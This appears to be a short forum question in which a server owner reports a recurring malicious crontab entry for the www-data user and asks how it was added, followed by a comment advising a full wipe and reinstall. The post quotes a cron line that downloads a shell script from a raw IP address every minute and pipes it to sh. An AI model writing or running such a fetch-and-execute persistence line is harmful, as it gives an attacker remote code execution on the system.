# Malware in www-data crontab

Tags: malware

Every so often I see this in my crontab of the www-data user

I know it's malware but i would like to know how this was changed, to prevent this from happening again.

I have already run several tools to detect malware but this does not stop

```
* * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1
```

Comment: A compromised system cannot be trusted anymore. It must be wiped and replaced. Take your system offline. Reinstall Ubuntu, reformatting everything. Reinstall the applications. Restore data from backups. How the malware works is simple: It exploits known or unknown vulnerabilities, it hides, and it was written by somebody clever.